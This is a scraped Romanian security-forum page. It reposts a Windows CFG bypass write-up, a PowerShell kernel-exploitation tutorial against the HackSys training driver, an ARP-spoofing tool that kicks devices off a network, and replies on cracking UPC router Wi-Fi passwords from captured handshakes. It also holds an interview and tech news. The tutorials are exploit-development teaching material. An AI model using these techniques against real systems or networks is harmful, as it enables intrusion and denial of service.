kernelbase.dll, then looking at the import tables for a pointer into ntdll.dll and again getting the base address and then looking up the exported functions from here to find RtlCaptureContext. While this method is perfectly valid it does have a drawback, if EMET is installed on the system it will trigger a crash since code coming from jscript9.dll, which our read/write primitive does, is not allowed to read data from the PE header or to go through the export table, to get around that I used a different technique. Remember that every indirect call protected by CFG calls ntdll!LdrpValidateUserCallTarget, and since jscript9.dll is protected by CFG any function with an indirect call contains a pointer directly into ntdll.dll. One such function is at offset 0x10 in the vtable: Using the read primitive, the pointer to ntdll.dll may then be found through the following function: Going from a pointer into ntdll.dll to the address of RtlCaptureContext without looking at the export tables may be accomplished by using the read primitive to search for a signature or hash. RtlCaptureContext looks like this: The first 0x30 bytes always stay the same and are pretty unique, so they may be used as a collision free hash when added together as seen below: Where the function takes a pointer into ntdll.dll as argument. Putting all of this together gives: From here offset 0x200 of the buffer contains the results from RtlCaptureContext, viewing it shows: From the above it is clear that stack pointers have been leaked, it is now a matter of finding an address to overwrite which will give execution control. Looking at the top of the stack shows: Which is the current function return address, this address is placed at an offset of 0x40 bytes from the leaked pointer at offset 0x9C in the RtlCaptureContext information. With a bit of luck this offset will be the same for other simple functions, so it should be possible to invoke the write primitive and make it overwrite its own return address thus bypassing CFG. The addition to the exploit is shown below: Which when run does show EIP control: Furthermore, the writes to offset 0x40 and 0x44 are now placed at the top of stack, which allows for creating a stack pivot and then a ROP chain, one way could be to use a POP EAX gadget followed by XCHG EAX, ESP gadget. Microsoft Mitigation Microsoft has stated that CFG bypassed which corrupt return addresses on the stack are a known design limitation and hence not eligible to fixes or any kind of bug bounty as shown here: With that said, Microsoft has done two things to mitigate this technique, first in the upcoming version of Windows 10, Return Flow Guard will be implemented which is seen as a way to stop stack corruptions from giving execution control. The other is the introduction of sensitive API’s in the Anniversary edition release of Windows 10, it only protects Microsoft Edge, so would not help in this case, but it does block the RtlCaptureContext API on Microsoft Edge. If you made it this far, thanks for reading. The proof of concept code can be found on: https://github.com/MortenSchenk/RtlCaptureContext-CFG-Bypass Sursa: https://improsec.com/blog//bypassing-control-flow-guard-in-windows-10
-
- 1
-
-
Part 17: Kernel Exploitation -> GDI Bitmap Abuse (Win7-10 32/64bit) Hello and welcome! We are, once again, diving into ring0 with @HackSysTeam's driver. In this post we will be revisiting the write-what-where vulnerability. By implementing a powerful ring0 read/write primitive we can create an exploit that works on Windows 7, 8, 8.1 and 10 (pre v1607) and targets both 32 and 64 bit architectures! As we will see, this technique is essentially a data attack so we will painlessly circumvent SMEP/SMAP/CFG/RFG => winning! This technique is slightly "complicated" and requires some prior knowledge on the part of the reader so I highly recommend that the resources below are reviewed before starting on this post. Finally, to keep things fresh we will be developing our exploit on a 64-bit Windows 10 host. Enough introductory nonsense, let's get to it! Resources: + HackSysTeam-PSKernelPwn (@FuzzySec) - here + Abusing GDI for ring0 exploit primitives (@CoreSecurity) - here + Abusing GDI Reloaded (@CoreSecurity) - here + This Time Font hunt you down in 4 bytes (@keen_lab) - here + Terminus Project (@rwfpl) - here Recon the challenge We are rehashing the write-what-where vulnerability from part 11 of this series so we won't go over the entire analysis again. We just want to make sure our arbitrary write still works as expected on Win 10. ? Add-Type -TypeDefinition @" using System; using System.Diagnostics; using System.Runtime.InteropServices; using System.Security.Principal; public static class EVD { [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern IntPtr CreateFile( String lpFileName, UInt32 dwDesiredAccess, UInt32 dwShareMode, IntPtr lpSecurityAttributes, UInt32 dwCreationDisposition, UInt32 dwFlagsAndAttributes, IntPtr hTemplateFile); [DllImport("Kernel32.dll", SetLastError = true)] public static extern bool DeviceIoControl( IntPtr hDevice, int IoControlCode, byte[] InBuffer, int nInBufferSize, byte[] OutBuffer, int nOutBufferSize, ref int pBytesReturned, IntPtr Overlapped); } "@ $hDevice = [EVD]::CreateFile("\\.\HacksysExtremeVulnerableDriver", [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero) if ($hDevice -eq -1) { echo "`n[!] Unable to get driver handle..`n" Return } else { echo "`n[>] Driver information.." echo "[+] lpFileName: \\.\HacksysExtremeVulnerableDriver" echo "[+] Handle: $hDevice" } [byte[]]$Buffer = [System.BitConverter]::GetBytes(0x4141414141414141) + [System.BitConverter]::GetBytes(0x4242424242424242) echo "`n[>] Sending buffer.." echo "[+] Buffer length: $($Buffer.Length)" echo "[+] IOCTL: 0x22200B" [EVD]::DeviceIoControl($hDevice, 0x22200B, $Buffer, $Buffer.Length, $null, 0, [ref]0, [System.IntPtr]::Zero) |Out-null We seem to get the expected result, as shown below. You may remember from part 11 that this is not entirely as it appears. The value we are writing is not in fact 0x4141414141414141 it is the pointer stored at that address. Also, our POC only works on 64 bit. We would do well to keep our exploit architecture independent from the start! We can modify the buffer structure as show below to get the arbitrary write we want on 32/64 bit. ? # [IntPtr]$WriteWhatPtr->$WriteWhat + $WriteWhere #--- [IntPtr]$WriteWhatPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.BitConverter]::GetBytes($WriteWhat).Length) [System.Runtime.InteropServices.Marshal]::Copy([System.BitConverter]::GetBytes($WriteWhat), 0, $WriteWhatPtr, [System.BitConverter]::GetBytes($WriteWhat).Length) if ($x32Architecture) { [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt32()) + [System.BitConverter]::GetBytes($WriteWhere) } else { [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt64()) + [System.BitConverter]::GetBytes($WriteWhere) } As long as pass in the appropriate variables, this should now work universally. Pwn all the things! Game Plan That's the easy part done. What we want to do now is turn a single arbitrary write into a full ring0 read/write primitive. At a high level we will (1) create two bitmap objects, (2) leak their respective kernel addresses, (3) use our arbitrary write to modify a header element for one of the bitmap objects and (4) use the the Gdi32 GetBitmapBits/SetBitmapBits API calls to read from and write to kernel space! Leaking Bitmap Kernel Objects The crucial part of this technique is that, when creating a bitmap, we can leak the address of the bitmap object in the kernel. This leak was patched by Microsoft in v1607 of Windows 10 (aka the anniversary patch) => crycry. As it turns out, when a bitmap is created, a struct is added to the GdiSharedHandleTable in the parent process PEB. Given the base address of the process PEB, the GdiSharedHandleTable is located at the following offsets (32/64 bit respectively). ? [StructLayout(LayoutKind.Explicit, Size = 256)] public struct _PEB { [FieldOffset(148)] public IntPtr GdiSharedHandleTable32; [FieldOffset(248)] public IntPtr GdiSharedHandleTable64; } This PEB entry is simply a pointer to an array of GDICELL structs which define a number of different image types. The definition of this struct can be seen below. ? /// 32bit size: 0x10 /// 64bit size: 0x18 [StructLayout(LayoutKind.Sequential)] public struct _GDI_CELL { public IntPtr pKernelAddress; public UInt16 wProcessId; public UInt16 wCount; public UInt16 wUpper; public UInt16 wType; public IntPtr pUserAddress; } Let's use the following POC to see if we can manually find the _GDI_CELL struct in KD. ? Add-Type -TypeDefinition @" using System; using System.Diagnostics; using System.Runtime.InteropServices; using System.Security.Principal; public static class EVD { [DllImport("gdi32.dll")] public static extern IntPtr CreateBitmap( int nWidth, int nHeight, uint cPlanes, uint cBitsPerPel, IntPtr lpvBits); } "@ [IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4) $Bitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer) "{0:X}" -f [int]$Bitmap We run the POC and get back a bitmap handle, immediately it seems obvious that this is not a standard handle value returned by so many Windows API calls (it is much too large). In fact, thanks to no cleverness on my part, the last two bytes of bitmap handles are actually the index for the struct in the GdiSharedHandleTable array (=> handle & 0xffff). Knowing this, let's jump in KD and see if we can find the _GDI_CELL struct for our newly created bitmap! With the pointer to the GdiSharedHandleTable array, all we need to do is add the struct index times the struct size (0x18 on 64bit). Process hacker has a very useful feature which allows us to list GDI object handles. We can use this to confirm the values we found in KD. Sw33t! For our ring0 primitive we need to collect this information programmatically for two bitmaps (a manager and a worker). As we were able to see, it's just some simple math based on the bitmap handle. The only question is how do we get the base address for the process PEB. Fortunately the undocumented, NtQueryInformationProcess function comes to the rescue. When called with the ProcessBasicInformation class (0x0), the function returns a struct which contains the base address of the PEB. I won't go into further detail on this as it is a well understood technique, hopefully the POC below will clear up any doubts! ? Add-Type -TypeDefinition @" using System; using System.Diagnostics; using System.Runtime.InteropServices; using System.Security.Principal; [StructLayout(LayoutKind.Sequential)] public struct _PROCESS_BASIC_INFORMATION { public IntPtr ExitStatus; public IntPtr PebBaseAddress; public IntPtr AffinityMask; public IntPtr BasePriority; public UIntPtr UniqueProcessId; public IntPtr InheritedFromUniqueProcessId; } /// Partial _PEB [StructLayout(LayoutKind.Explicit, Size = 256)] public struct _PEB { [FieldOffset(148)] public IntPtr GdiSharedHandleTable32; [FieldOffset(248)] public IntPtr GdiSharedHandleTable64; } [StructLayout(LayoutKind.Sequential)] public struct _GDI_CELL { public IntPtr pKernelAddress; public UInt16 wProcessId; public UInt16 wCount; public UInt16 wUpper; public UInt16 wType; public IntPtr pUserAddress; } public static class EVD { [DllImport("ntdll.dll")] public static extern int NtQueryInformationProcess( IntPtr processHandle, int processInformationClass, ref _PROCESS_BASIC_INFORMATION processInformation, int processInformationLength, ref int returnLength); [DllImport("gdi32.dll")] public static extern IntPtr CreateBitmap( int nWidth, int nHeight, uint cPlanes, uint cBitsPerPel, IntPtr lpvBits); } "@ #==============================================[PEB] # Flag architecture $x32Architecture/!$x32Architecture if ([System.IntPtr]::Size -eq 4) { echo "`n[>] Target is 32-bit!" $x32Architecture = 1 } else { echo "`n[>] Target is 64-bit!" } # Current Proc handle $ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle # Process Basic Information $PROCESS_BASIC_INFORMATION = New-Object _PROCESS_BASIC_INFORMATION $PROCESS_BASIC_INFORMATION_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($PROCESS_BASIC_INFORMATION) $returnLength = New-Object Int $CallResult = [EVD]::NtQueryInformationProcess($ProcHandle, 0, [ref]$PROCESS_BASIC_INFORMATION, $PROCESS_BASIC_INFORMATION_Size, [ref]$returnLength) # PID & PEB address echo "`n[?] PID $($PROCESS_BASIC_INFORMATION.UniqueProcessId)" if ($x32Architecture) { echo "[+] PebBaseAddress: 0x$("{0:X8}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt32())" } else { echo "[+] PebBaseAddress: 0x$("{0:X16}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64())" } # Lazy PEB parsing $_PEB = New-Object _PEB $_PEB = $_PEB.GetType() $BufferOffset = $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64() $NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset $PEBFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB) # GdiSharedHandleTable if ($x32Architecture) { echo "[+] GdiSharedHandleTable: 0x$("{0:X8}" -f $PEBFlags.GdiSharedHandleTable32.ToInt32())" } else { echo "[+] GdiSharedHandleTable: 0x$("{0:X16}" -f $PEBFlags.GdiSharedHandleTable64.ToInt64())" } # _GDI_CELL size $_GDI_CELL = New-Object _GDI_CELL $_GDI_CELL_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($_GDI_CELL) #==============================================[/PEB] #==============================================[Bitmap] echo "`n[>] Creating Bitmaps.." # Manager Bitmap [IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4) $ManagerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer) echo "[+] Manager BitMap handle: 0x$("{0:X}" -f [int]$ManagerBitmap)" if ($x32Architecture) { $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size) echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)" $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry) echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))" } else { $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size) echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)" $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry) echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))" } # Worker Bitmap [IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4) $WorkerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer) echo "[+] Worker BitMap handle: 0x$("{0:X}" -f [int]$WorkerBitmap)" if ($x32Architecture) { $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size) echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)" $WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry) echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))" } else { $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size) echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)" $WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry) echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))" } #==============================================[/Bitmap] © Copyright FuzzySecurity Articol complet: https://www.fuzzysecurity.com/tutorials/expDev/21.html
-
- 1
-
-
Damn Vulnerable Web Sockets (DVWS) Damn Vulnerable Web Sockets (DVWS) is a vulnerable web application which works on web sockets for client-server communication. The flow of the application is similar to DVWA. You will find more vulnerabilities than the ones listed in the application. Requirements In the hosts file of your attacker machine create an entry for dvws.local to point at the IP address hosting the DVWS application. Location of hosts file: Windows: C:\windows\System32\drivers\etc\hosts Linux: /etc/hosts Sample entry for hosts file: 192.168.100.199 dvws.local The application requires the following: Apache + PHP + MySQL PHP with MySQLi support Ratchet ReactPHP-MySQL Link: https://github.com/interference-security/DVWS
-
Know your community – Ionut Popescu January 16, 2017 SecuriTeam Secure Disclosure Maor Schwartz When we sponsored DefCamp Romania back in November 2016, I saw Ionut Popescu lecture “Windows shellcodes: To be continued” and thought to myself “He’s must be a key figure in the Romanian security community – I must interview him” so I did! Introduction Ionut is working as a Senior Penetration Tester for SecureWorks Romania. Speaker at DefCon and DefCamp, writer of NetRipper, ShellcodeCompiler and a family man. Questions Q: What was your motivation to getting into the security field? A: First of all, the security field is challenging. It’s like a good movie whose main character has to do some tricky moves to find the truth – In the security field it’s he same. Second, it’s fun. Get access to different systems or to exploit applications. Your friends will think you did something really complicated when you actually exploited a simple vulnerability. My motivations were never (and will never be) fame or money, it’s the challenge and learning. Q: When did you get into the security field? A: I got my first computer when I was 16. I used it to play games until I found a small Romanian security forum. I saw that there was a lot of challenging stuff you could do and I became interested in the security field. During this process I learned Visual Basic 6 / HTML / CSS / JS / PHP / MySQL and practiced my web application vulnerability research skills. After some time I became interested in more complicated stuff such as C/C++ and ASM. It’s was step by step learning where the more you know, the more you realize you don’t know. Q: Since you started, you have found vulnerabilities (vBulletin for example), wrote exploitations tools like NetRipper and ShellcodeCompiler. Why did you decide to specialize in offensive security? A: Offensive security is the fun part of security. From my point of view, it is more complicated, more fun and more challenging than defensive security. Let’s take the vBulletin example. I managed a vBulletin installation and I wanted to make sure the forum was secure. I always updated with the latest vBulletin patches, our server was up to date and it even had a few hardening configurations – this is defensive security. But when I decided to take a look on my own at vBulletin, I found an SQL Injection. Guess what made me happier – installing patches and keeping a system up to date or the discovery of an SQL Injection? Since I was young, I was more attracted by the offensive part of security. Q: Why did you develop NetRipper and ShellcodeCompiler? A: A long time ago I discovered that by using API hooking (intercepting Windows function calls) you can do a lot of stuff. While working on an internal penetration test on a limited system, I had the idea that I could capture the traffic made by administration tools in order to pivot to other systems. The idea was not new, but the available tools did not offer what I wanted – a post-exploitation tool to help penetration testers on their engagements. So, I started working on NetRipper, which was released at Defcon 23. Recently, being interested in low-level stuff such as ASM and Windows Internals, I wanted to write my own shellcodes. I did it easily on Linux, but it was a little bit more complicated on Windows. I noticed that you will repeat a lot of the content from one shellcode to another, so I decided to automate this. This idea was also not new. I saw a basic shellcode compiler, but its users had to write ASM code. I wanted a fast and easy way to write one. This is how Shellcode Compiler was born. Q: What is the most innovative project you did as offensive security researcher? A: I think the most innovative project I did as a security researcher is Shellcode Compiler. Even if the idea is not new and the tool is really limited, it turns a difficult job into a really easy one, and anyone can write a shellcode. However, I still need to implement a few features that will make it more useful. I don’t have a lot of free time to work on this project, but I always try to make some time for it. Q: Where did you learn to be an offensive security researcher? A: I started to learn from security forums. I still remember hacky0u forums. Now I get most of my technical stuff from Twitter. My tweets are actually a “to read” list. I like to see that a lot of technical people share their knowledge. I read anything that’s new from blogs, whitepapers and security conferences. I find Twitter is the central place where I can find all this information by following the right people. Q: How big is the security community in Romania? A: The security community in Romania is medium-sized. There are really good security guys in Romania, but many of them don’t have the necessary time to share their knowledge. There are security researchers from Romania that spoke at well-known security conferences, write tools and whitepapers, but not as much as I would like to. In my opinion, it doesn’t matter from where is the researcher – we live in international world, especially the security researchers community. Q: I saw that you are one of the Admins in the Romanian security forums called RST Forums. Why did you open the forum? What was the goal? How helps you to manage it? A: RST Forums is the largest Romanian security community. It is a well-known forum in Romania and most of the content is Romanian. I did not open this forum; a few other guys did it in 2006. However, they decided to leave the community, and so I am just continuing it. The goal is to help young and newbie Romanian learn security. I have friends that visited the forums for game cheats or programming help, eventually they got in to the security field and now they are working as penetration testers for large companies – the forum helped a lot of us in our careers, and that’s why it is still open. I hope many other young Romanians will use it as a way to start their careers in the field of information security. Q: How do you support the security research community today? A: I don’t do as much for the security research community as I would like. The two tools I released, NetRipper and ShellcodeCompiler, were to support the research community. I have written different technical articles and whitepapers and spoken at security conferences. Oh, and I also tweet useful technical stuff. It is not much, but it is something, and I hope someone will find my work useful. Q: Do you have a tool you are working on today? Do you know when you are going to release it? A: Right now, I would like to work on my current projects. I don’t have a new idea for a tool and it is not a good idea to work on one until the other tools are not as fully-featured and stable as I would like them to be. It was a pleasure, Ionut, to talk to you and get so much information on the local Romanian community You’re welcome. Link: https://blogs.securiteam.com/index.php/archives/2916
-
- 12
-
-
-
./ban.sh
-
Vă mai amintiţi de laptopul cu 3 ecrane prezentat de Razer la CES
Nytro replied to Nytro's topic in Stiri securitate
Aici e: https://zonait.tv/un-laptop-razer-furat-apare-la-vanzare/ -
Da, corect, eu vazusem ca parolele generate de acele site-uri au 7 caractere, nu am numarat bine, au 8.
-
Cea mai comuna metoda e sa capturezi un handshake si sa spargi parola. In particular, pentru UPC, pentru anumite modele de routere probabil, exista acea metoda de "generare" a parolei deoarece se foloseste un algoritm dobitoc. Daca nu merge, parola default cred ca e ceva de genul acela. Da, parola se poate schimba cu ce vrea utilizatorul.
-
Aparent, parolele au 7 caractere si sunt doar litere mari. Captureaza un WPA2 handshake si seteaza un mask pentru cracking la parola care sa acopere doar acest key space.
-
Vă mai amintiţi de laptopul cu 3 ecrane prezentat de Razer la CES
Nytro replied to Nytro's topic in Stiri securitate
Probabil se gaseste e okazii sau pe olx. -
Producatorul roman de ceasuri inteligente Vector Watch a fost cumparat de Fitbit de Raluca Abrihan 10 ianuarie 2017 11.39 Vector Watch, startup-ul romanesc producator de ceasuri smart cu autonomia de o luna, a fost cumparat de compania americana Fitbit, cunoscuta pentru bratarile inteligente de fitness cu acelasi nume. “Azi, suntem bucurosi sa anuntam ca echipa Vector Watch si platfomra noastra software se alatura comaniei Fitbit lider pe piata de dispozitive purtabile de fitness si sanatate”, a anuntat startup-ul local Vector Watch pe site-ul oficial. Compania a fost lansata in 2015, iar pachetul majoritar de actiuni era detinut de Gecad Ventrures, fond de investitii local controlat de omul de afaceri Radu Georgescu. Vector Watch se vinde in 25 de piete, la un an de la lansare. In afara de pietele foarte mari, SUA, Marea Britanie, ceasul a fost lansat si in piete exotice precum Thailanda, Singapore, Malaezia si Filipine. Ceasul se vinde in peste 500 de puncte de vanzare, incluzand aici atat magazinele fizice , cat si cele online. Amazon este principalul canal de vanzari la nivel mondial, dar vanzari importante sunt generate si prin Orange cu care au fost semnate parteneriate in mai multe tari. De exemplu ceasul se vinde la cel mai mare magazin Orange din Paris si foarte recent a fost semnat un parteneriat cu Microsoft UK, astfel incat ceasul poate fi cumparat de pe magazinul online al companiei americane, fiind printre putinele smartwatch-uri premium care au aplicatie pe Windows. Vector Watch are 40 de angajati. Echipa de dezvoltare este la Bucuresti, o mica echipa de vanzari se afla in SUA si mai exista o echipa de vanzari in regiunea EMEA. Din punct de vedere retail si financiar sediul este la Londra unde se gasesc si stocurile, in timp ce in Romania este "sediul tehnologic". Fitbit este cel mai mare jucator din piata dispozitivelor "wearable" si a vandut in cel de al doilea trimestru al anului trecut 5,3 milioane de dispozitive "wearable", avand 23% din piata. Sursa: http://www.startupcafe.ro/stiri-afaceri-21523479-vector-fitbit-cumparat-vanzare-ceasuri-inteligente.htm
-
Vă mai amintiţi de laptopul cu 3 ecrane prezentat de Razer la CES? A fost furat Adrian Popa - 9 ian 2017 Razer a făcut valuri la CES 2017 cu laptopul său cu trei ecrane. Deşi un prototip, dispozitivul arată ce se poate face cu tehnologia de azi. Computerul a atras din nou atenţia după ce a fost furat de la salon, în ultima zi. Hoţul a furat două concepte ale companiei, printre care şi laptopul cu trei ecrane. „Am fost informat că două dintre prototipurile noastre au fost furate astăzi din cabina de la CES”, a scris pe Facebook şeful companiei, Min-Liang Tan. Organizatorii CES şi poliţia au deschis o anchetă şi încearcă să găsească hoţul. Nu este prima dată când Razer atrage atenţia hoţilor. În 2011, două prototipuri de laptopuri Blade au fost furate din centrul de cercetare şi dezvoltare al companiei din San Francisco. Nu este exclusă nici varianta spionajului industrial. Este foarte posibil ca dispozitivele concept să fi fost furate de o companie rivală pentru a fi studiate în detaliu. Sursa: http://www.go4it.ro/curiozitati/va-mai-amintiti-de-laptopul-cu-3-ecrane-prezentat-de-razer-la-ces-a-fost-furat-16053902/
-
Yahoo s-a dus, rămășițele sale devin Altaba by unacomn on 10/01/2017 Achiziția companiei Yahoo de către conglomeratul de telecomunicații american Verizon s-a încheiat. Această afacere se află în desfășurare încă din vara anului trecut, trecând de atunci peste câteva hopuri, după ce Yahoo a dezvăluit că a fost de două ori victima a celui mai mare incident de hacking din istoria internetului, fiind periclitate inițial o jumătate de miliard de conturi, iar apoi un miliard întreg. Totuși, în ciuda revoltării generale la adresa modului în care Yahoo a tratat incidentul, achiziția nu a fost afectată, iar Verizon a plătit suma de 4.8 miliarde de dolari pentru ceea ce a fost odată cea mai valoroasă companie de internet din lume. După această achiziție, toate funcțiile principale ale Yahoo vor trece sub tutela Verizon, urmând ca investițiile companiei în Alibaba și alte companii din Asia să fie consolidate sub numele Altaba. Aceasta componentă va rămâne independentă și în efect reprezintă tot ce mai rămâne din Yahoo care să nu fie o proprietate a Verizon. Conducerea curentă a Yahoo și-a luat tălpășița, Marissa Mayer nu mai este CEO, co-fondatorul companiei David Filo nu se mai află acolo, iar o mare parte din toți ceilalți care au ghidat compania spre situația sa precară vor căuta acum alte locuri de muncă. Serviciile Yahoo vor rămâne în funcțiune, dacă încă le mai folosește cineva. [Ars Technica] Sursa: https://zonait.tv/yahoo-nu-mai-exista/
- 1 reply
-
- 3
-
-
Asta merge? https://ubee.deadcode.me/ https://upc.michalspacek.cz/ http://haxx.in/upc-wifi/
-
KickThemOut KickThemOut - Kick Devices Off Your Network A tool to kick devices out of your network and enjoy all the bandwidth for yourself. It allows you to select specific or all devices and ARP spoofs them off your local area network. Compatible with Python 2.6 & 2.7. Authors: Nikolaos Kamarinakis & David Schütz Installation You can download KickThemOut by cloning the Git Repo and simply installing its requirements: $ git clone https://github.com/k4m4/kickthemout.git $ cd kickthemout $ pip install -r requirements.txt Demo Here's a short demo: (For more demos click here) Disclaimer KickThemOut is provided as is under the MIT Licence (as stated below). It is built for educational purposes only. If you choose to use it otherwise, the developers will not be held responsible. In brief, do not use it with evil intent. License Copyright (c) 2017 by Nikolaos Kamarinakis & David Schütz. Some rights reserved. KickThemOut is under the terms of the MIT License, following all clarifications stated in the license file. For more information head over to the official project page. You can also go ahead and email me anytime at nikolaskam{at}gmail{dot}com or David at xdavid{at}protonmail{dot}com. Link: https://github.com/k4m4/kickthemout
-
- 2
-
-
Hacker publishes GitHub secret key hunter TruffleHog snuffles through your dirty commit drawers,. 9 Jan 2017 at 06:56, Team Register A researcher has published a tool to help administrators delve into GitHub commits to find high-entropy secret keys. The tool, dubbed TruffleHog, is able to locate high-entropy keys with Github potentially saving admins from exposing their networks and sensitive data. TruffleHog developer Dylan Ayrey, who warned of the Pastejack attack last year, says the tool will locate any high entropy string longer than 20 characters. "[TruffleHog] searches through git repositories for high entropy strings, digging deep into commit history and branches," Ayrey says. "This is effective at finding secrets accidentally committed that contain high entropy. "If at any point a high entropy string >20 characters is detected, it will print to the screen." TruffleHog in action. He says it searches the entire commit history of branches, checking each diff in commits, and evaluating the Shannon entropy for both the base64 character set and the hexadecimal character set for every blob of text larger than 20 characters and comprised of those character sets in each diff. Reddit users praising the tool have claimed Amazon already searches GitHub for AWS keys and shutters the respective service when any are found. TruffleHog relies only on GitPython. ® Sursa: http://www.theregister.co.uk/2017/01/09/hacker_publishes_github_secret_key_hunter/
-
- 3
-